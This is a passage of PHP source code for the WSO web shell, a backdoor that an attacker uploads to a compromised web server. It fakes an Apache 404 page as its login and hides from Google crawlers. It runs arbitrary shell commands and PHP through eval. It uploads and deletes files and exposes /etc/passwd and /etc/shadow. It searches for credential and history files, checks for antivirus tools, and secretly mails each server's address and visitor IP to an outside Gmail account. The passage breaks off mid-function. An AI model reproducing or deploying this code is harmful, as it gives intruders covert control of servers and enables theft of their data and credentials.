false){\r\n @\$gitt = file_get_contents(\$x);\r\n }\r\n}elseif(function_exists('file_get_contents')){\r\n @\$gitt = file_get_contents(\$x);\r\n}\r\n?><?php \$auth_pass = \"a6d13df8a46cf713e5cda6a6c0d043bf\";\r\n \$color = \"#00ff66\";\r\n \$default_action = 'FilesMan';\r\n @define('SELF_PATH', __FILE__);\r\n if( strpos(\$_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set('error_log',NULL);\r\n @ini_set('display_errors',0);\r\n @ini_set('log_errors',0);\r\n @ini_set('max_execution_time',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define('VERSION', '');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array(\$array) { return is_array(\$array) ? array_map('stripslashes_array', \$array) : stripslashes(\$array);\r\n } \$_POST = stripslashes_array(\$_POST);\r\n } function printLogin() { echo '<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at '.\$_SERVER['HTTP_HOST'].' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>';\r\n exit;\r\n } if( !isset( \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] )) if( empty( \$auth_pass ) || ( isset( \$_POST['pass'] ) && ( md5(\$_POST['pass']) == \$auth_pass ) ) ) \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == \"win\" ) \$os = 'win';\r\n else \$os = 'nix';\r\n \$safe_mode = @ini_get('safe_mode');\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$home_cwd = @getcwd();\r\n if( isset( \$_POST['c'] ) ) @chdir(\$_POST['c']);\r\n \$cwd = @getcwd();\r\n if( \$os == 'win') { \$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n \$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\r\n } if( \$cwd[strlen(\$cwd)-1] != '/' ) \$cwd .= '/';\r\n if(\$os == 'win') { \$aliases = array( \"List Directory\" => \"dir\", \"Find index.php in current dir\" => \"dir /s /w /b index.php\", \"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\", \"Show active connections\" => \"netstat -an\", \"Show running services\" => \"net start\", \"User accounts\" => \"net user\", \"Show computers\" => \"net view\", \"ARP Table\" => \"arp -a\", \"IP Configuration\" => \"ipconfig /all\" );\r\n } else { \$aliases = array( \"List dir\" => \"ls -la\", \"list file attributes on a Linux second extended file system\" => \"lsattr -va\", \"show opened ports\" => \"netstat -an | grep -i listen\", \"Find\" => \"\", \"find all suid files\" => \"find / -type f -perm -04000 -ls\", \"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\", \"find all sgid files\" => \"find / -type f -perm -02000 -ls\", \"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\", \"find config.inc.php files\" => \"find / -type f -name config.inc.php\", \"find config* files\" => \"find / -type f -name \\\"config*\\\"\", \"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\", \"find all writable folders and files\" => \"find / -perm -2 -ls\", \"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\", \"find all service.pwd files\" => \"find / -type f -name service.pwd\", \"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\", \"find all .htpasswd files\" => \"find / -type f -name .htpasswd\", \"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\", \"find all .bash_history files\" => \"find / -type f -name .bash_history\", \"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\", \"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\", \"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\", \"Locate\" => \"\", \"locate httpd.conf files\" => \"locate httpd.conf\", \"locate vhosts.conf files\" => \"locate vhosts.conf\", \"locate proftpd.conf files\" => \"locate proftpd.conf\", \"locate psybnc.conf files\" => \"locate psybnc.conf\", \"locate my.conf files\" => \"locate my.conf\", \"locate admin.php files\" =>\"locate admin.php\", \"locate cfg.php files\" => \"locate cfg.php\", \"locate conf.php files\" => \"locate conf.php\", \"locate config.dat files\" => \"locate config.dat\", \"locate config.php files\" => \"locate config.php\", \"locate config.inc files\" => \"locate config.inc\", \"locate config.inc.php\" => \"locate config.inc.php\", \"locate config.default.php files\" => \"locate config.default.php\", \"locate config* files \" => \"locate config\", \"locate .conf files\"=>\"locate '.conf'\", \"locate .pwd files\" => \"locate '.pwd'\", \"locate .sql files\" => \"locate '.sql'\", \"locate .htpasswd files\" => \"locate '.htpasswd'\", \"locate .bash_history files\" => \"locate '.bash_history'\", \"locate .mysql_history files\" => \"locate '.mysql_history'\", \"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\", \"locate backup files\" => \"locate backup\", \"locate dump files\" => \"locate dump\", \"locate priv files\" => \"locate priv\" );\r\n } function ex(\$in) { \$out = '';\r\n if(function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n }elseif(function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n }elseif(function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n }elseif(is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } function which(\$p) { \$path = ex('which '.\$p);\r\n if(!empty(\$path)) return \$path;\r\n return false;\r\n } function printHeader() { if(empty(\$_POST['charset'])) \$_POST['charset'] = \"UTF-8\";\r\n global \$color;\r\n echo '<html><head><meta http-equiv=\"Content-Type\" content=\"text/html;\r\n charset='.\$_POST['charset'].'\"><title>r00t.info wso Shell</title><link REL=\"SHORTCUT ICON\" HREF=\"http://imagizer.imageshack.us/a/img440/4273/6fix.png\">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:'.\$color.' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid '.\$color.';\r\n font: 9pt Monospace,\"Courier New\";\r\n }\r\n input[type=\"button\"]:hover,input[type=\"submit\"]:hover {background-color:'.\$color.';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = \"ajax=true\";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += \"&\"+document.mf.elements[i].name+\"=\"+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr(\"'.\$_SERVER['REQUEST_URI'].'\", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open(\"POST\", url, true);\r\n\r\n req.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", \"m\");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert(\"Request error!\");\r\n\r\n }\r\n </script>\r\n <head><body><div style=\"position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n\"><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n <form method=post name=mf style=\"display:none;\r\n\">\r\n <input type=hidden name=a value=\"'.(isset(\$_POST['a'])?\$_POST['a']:'').'\">\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"'.(isset(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'\">\r\n <input type=hidden name=p2 value=\"'.(isset(\$_POST['p2'])?htmlspecialchars(\$_POST['p2']):'').'\">\r\n <input type=hidden name=p3 value=\"'.(isset(\$_POST['p3'])?htmlspecialchars(\$_POST['p3']):'').'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n </form>';\r\n \$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n \$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n \$totalSpace = \$totalSpace?\$totalSpace:1;\r\n \$disable_functions = @ini_get('disable_functions');\r\n \$release = @php_uname('r');\r\n \$kernel = @php_uname('s');\r\n if(!function_exists('posix_getegid')) { \$user = @get_current_user();\r\n \$uid = @getmyuid();\r\n \$gid = @getmygid();\r\n \$group = \"?\";\r\n } else { \$uid = @posix_getpwuid(@posix_geteuid());\r\n \$gid = @posix_getgrgid(@posix_getegid());\r\n \$user = \$uid['name'];\r\n \$uid = \$uid['uid'];\r\n \$group = \$gid['name'];\r\n \$gid = \$gid['gid'];\r\n } \$cwd_links = '';\r\n \$path = explode(\"/\", \$GLOBALS['cwd']);\r\n \$n=count(\$path);\r\n for(\$i=0;\r\n\$i<\$n-1;\r\n\$i++) { \$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\n for(\$j=0;\r\n\$j<=\$i;\r\n\$j++) \$cwd_links .= \$path[\$j].'/';\r\n \$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n } \$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\r\n \$opt_charsets = '';\r\n foreach(\$charsets as \$item) \$opt_charsets .= '<option value=\"'.\$item.'\" '.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\r\n \$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Delete LOG'=>'DeleteLOG','Safe Mode'=>'SafeMode','String tools'=>'StringTools','Cgi'=>'Cgi','Network'=>'Network','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Symlink'=>'Symlink','SQLBUDDY'=>'SQLBUDDY','Bypass'=>'Bypass','Python'=>'Python');\r\n if(!empty(\$GLOBALS['auth_pass'])) \$m['SelfKill'] = 'SelfRemove';\r\n \$m['Logout'] = 'Logout';\r\n \$menu = '';\r\n foreach(\$m as \$k => \$v) \$menu .= '<th><a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a></th>';\r\n \$drives = \"\";\r\n if (\$GLOBALS['os'] == 'win') { foreach( range('a','z') as \$drive ){ if (is_dir(\$drive.':\\\\')) \$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n } \$drives .= '<br />: ';\r\n } if(\$GLOBALS['os'] == 'nix') { \$dominios = @file_get_contents(\"/etc/named.conf\");\r\n if(!\$dominios) { \$d0c = \"CANT READ named.conf\";\r\n } else { @preg_match_all('/.*?zone \"(.*?)\" {/', \$dominios, \$out);\r\n \$out = sizeof(array_unique(\$out[1]));\r\n \$d0c = \$out.\" Domains\";\r\n } } else { \$d0c = \" --- \";\r\n } if(\$GLOBALS['os'] == 'nix' ) { \$usefl = '';\r\n \$dwnldr = '';\r\n if(!@ini_get('safe_mode')) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n foreach(\$userful as \$item) { if(which(\$item)) \$usefl.= \$item.',';\r\n } \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n foreach(\$downloaders as \$item2) { if(which(\$item2)) \$dwnldr.= \$item2.',';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } } else { \$usefl = ' ------- ';\r\n \$dwnldr = ' ------- ';\r\n } echo '<table class=\"info\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr><td width=\"160px\"><div class=\"logo\"><img src=\"http://i.hizliresim.com/z4lrbR.png\" id=\"logo\" height=\"75%\" width=\"90%\"/></div><hr style=\"margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n\"><div class=\"eca1\"></div><div class=\"eca2\">Hackers</div></td>\r\n <td><table cellpadding=\"3\" cellspacing=\"0\" class=\"npoad\"><tr><td width=\"125px;\r\n\"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: '.\$uid.' ( '.\$user.' ) <span>Group: </span> '.\$gid.' ( '.\$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.\$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.\$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.(\$disable_functions?\$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.(\$GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.\$drives.''.\$cwd_links.' '.viewPermsColor(\$GLOBALS['cwd']).' <a href=# onclick=\"g(\\'FilesMan\\',\\''.\$GLOBALS['home_cwd'].'\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a></td></tr></table></td>'. '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'. '<td><nobr>: '.gethostbyname(\$_SERVER[\"HTTP_HOST\"]).'<br>: '.\$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize(\$totalSpace).'<br />: '.viewSize(\$freeSpace).' ('.(int)(\$freeSpace/\$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick=\"g(\\'Php\\',null,null,\\'info\\')\">[ phpinfo ]</a><br />: '.(\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.\$color.'<b>OFF</b></font>').'<br />: '.\$d0c.'</nobr></td></tr></table>'. '</div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\npadding:2px;\r\n\"><table cellpadding=\"3\" cellspacing=\"0\" width=\"100%\" class=\"menu\"><tr>'.\$menu.'</tr></table></div></div><div style=\"margin:5;\r\nbackground:#444;\r\n\">';\r\n } function printFooter() { \$is_writable = is_writable(\$GLOBALS['cwd'])?\"<font color=#00cd00>[ Writeable ]</font>\":\"<font color=red>[ Not writable ]</font>\";\r\n echo '</div><div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\n\">\r\n<table class=\"info\" id=\"toolsTbl\" cellpadding=\"3\" cellspacing=\"0\" width=\"100%\">\r\n <tr>\r\n <td><form onsubmit=\"g(null,this.c.value);\r\nreturn false;\r\n\"><span>Change dir:</span><br><input class=\"toolsInp\" type=text name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\"><input type=submit value=\">>\"></form></td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value);\r\nreturn false;\r\n\"><span>Read file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'FilesMan\\',null,\\'mkdir\\',this.d.value);\r\nreturn false;\r\n\"><span>Make dir:</span><br><input class=\"toolsInp\" type=text name=d><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n <td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value,\\'mkfile\\');\r\nreturn false;\r\n\"><span>Make file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit=\"g(\\'Console\\',null,this.c.value);\r\nreturn false;\r\n\"><span>Execute:</span><br><input class=\"toolsInp\" type=text name=c value=\"\"><input type=submit value=\">>\"></form></td>\r\n <td><form method=\"post\" ENCTYPE=\"multipart/form-data\">\r\n <input type=hidden name=a value=\"FilesMAn\">\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=p1 value=\"uploadFile\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <span>Upload file:</span><br><input class=\"toolsInp\" type=file name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style=\"margin:5px;\r\nbackground:#444;\r\n\"><div class=\"content\" style=\"border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n\">Wso shell'.VERSION.' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>';\r\n } if ( !function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid(\$p) { return false;\r\n } } if ( !function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid(\$p) { return false;\r\n } } if(!isset(\$_SESSION['trimite'])){ \$url=\$_SERVER['HTTP_HOST'].\$_SERVER['REQUEST_URI'].'<br />User IP: '.\$_SERVER['REMOTE_ADDR'].(isset(\$_SERVER['HTTP_X_FORWARDED_FOR'])?'('.\$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');\r\n @mail(\"byhero44@gmail.com\",\"Smurfie\",\$url);\r\n \$_SESSION['trimite']=true;\r\n } function viewSize(\$s) { if(\$s >= 1073741824) return sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\n elseif(\$s >= 1048576) return sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\n elseif(\$s >= 1024) return sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\n else return \$s . ' B';\r\n } function perms(\$p) { if ((\$p & 0xC000) == 0xC000)\$i = 's';\r\n elseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\n elseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\n elseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\n elseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\n elseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\n elseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n else \$i = 'u';\r\n \$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n \$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n \$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n \$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\n return \$i;\r\n } function viewPermsColor(\$f) { if (!@is_readable(\$f)) return '<font color=#FF0000><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n elseif (!@is_writable(\$f)) return '<font color=white><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n else return '<font color=#00cd00><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n } if(!function_exists(\"scandir\")) { function scandir(\$dir) { \$dh = opendir(\$dir);\r\n while (false !== (\$filename = readdir(\$dh))) { \$files[] = \$filename;\r\n } return \$files;\r\n } } function actionSecInfo() { printHeader();\r\n echo '<h1>Server security information</h1><div class=content>';\r\n function showSecParam(\$n, \$v) { \$v = trim(\$v);\r\n if(\$v) { echo '<span>'.\$n.': </span>';\r\n if(strpos(\$v, \"\\n\") === false) echo \$v.'<br>';\r\n else echo '<pre class=ml1>'.\$v.'</pre>';\r\n } } showSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\n showSecParam('Disabled PHP Functions', (\$GLOBALS['disable_functions'])?\$GLOBALS['disable_functions']:'none');\r\n showSecParam('Open base dir', @ini_get('open_basedir'));\r\n showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\n showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\n showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n \$temp=array();\r\n if(function_exists('mysql_get_client_info')) \$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n if(function_exists('mssql_connect')) \$temp[] = \"MSSQL\";\r\n if(function_exists('pg_connect')) \$temp[] = \"PostgreSQL\";\r\n if(function_exists('oci_connect')) \$temp[] = \"Oracle\";\r\n showSecParam('Supported databases', implode(', ', \$temp));\r\n echo '<br>';\r\n if( \$GLOBALS['os'] == 'nix' ) { \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\n showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"etc\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\n showSecParam('OS version', @file_get_contents('/proc/version'));\r\n showSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\n if(!\$GLOBALS['safe_mode']) { echo '<br>';\r\n \$temp=array();\r\n foreach (\$userful as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Userful', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$danger as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Danger', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$downloaders as \$item) if(which(\$item)){\$temp[]=\$item;\r\n} showSecParam('Downloaders', implode(', ',\$temp));\r\n echo '<br/>';\r\n showSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\n showSecParam('HDD space', ex('df -h'));\r\n showSecParam('Mount options', @file_get_contents('/etc/fstab'));\r\n } } else { showSecParam('OS Version',ex('ver'));\r\n showSecParam('Account Settings',ex('net accounts'));\r\n showSecParam('User Accounts',ex('net user'));\r\n } echo '</div>';\r\n printFooter();\r\n } function actionPhp() { if( isset(\$_POST['ajax']) ) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n eval(\$_POST['p1']);\r\n \$temp = \"document.getElementById('PhpOutput').style.display='';\r\ndocument.getElementById('PhpOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n if( isset(\$_POST['p2']) && (\$_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>';\r\n ob_start();\r\n phpinfo();\r\n \$tmp = ob_get_clean();\r\n \$tmp = preg_replace('!body {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!a:\\w+ {.*}!msiU','',\$tmp);\r\n \$tmp = preg_replace('!h1!msiU','h2',\$tmp);\r\n \$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {\$1}',\$tmp);\r\n \$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',\$tmp);\r\n echo \$tmp;\r\n echo '</div><br>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\'\\');\r\n}return false;\r\n\"><textarea name=code class=bigarea id=PhpCode>'.(!empty(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'</textarea><input type=submit value=Eval style=\"margin-top:5px\">';\r\n echo ' <input type=checkbox name=ajax value=1 '.(@\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style=\"'.(empty(\$_POST['p1'])?'display:none;\r\n':'').'margin-top:5px;\r\n\" class=ml1>';\r\n if(!empty(\$_POST['p1'])) { ob_start();\r\n eval(\$_POST['p1']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo '</pre></div>';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo '<h1>File manager</h1><div class=content>';\r\n if(isset(\$_POST['p1'])) { switch(\$_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name'])) echo \"Can't upload file!\";\r\n break;\r\n break;\r\n case 'mkdir': if(!@mkdir(\$_POST['p2'])) echo \"Can't create new dir\";\r\n break;\r\n case 'delete': function deleteDir(\$path) { \$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n \$dh = opendir(\$path);\r\n while ( (\$item = readdir(\$dh) ) !== false) { \$item = \$path.\$item;\r\n if ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") ) continue;\r\n \$type = filetype(\$item);\r\n if (\$type == \"dir\") deleteDir(\$item);\r\n else @unlink(\$item);\r\n } closedir(\$dh);\r\n rmdir(\$path);\r\n } if(is_array(@\$_POST['f'])) foreach(\$_POST['f'] as \$f) { \$f = urldecode(\$f);\r\n if(is_dir(\$f)) deleteDir(\$f);\r\n else @unlink(\$f);\r\n } break;\r\n case 'paste': if(\$_SESSION['act'] == 'copy') { function copy_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = 